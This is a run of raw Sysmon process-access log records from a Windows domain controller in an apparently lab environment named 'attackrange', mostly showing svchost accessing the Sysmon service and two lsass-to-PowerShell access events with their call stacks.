13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.345{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E57-6005-3600-00000000A301}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.345{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.330{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
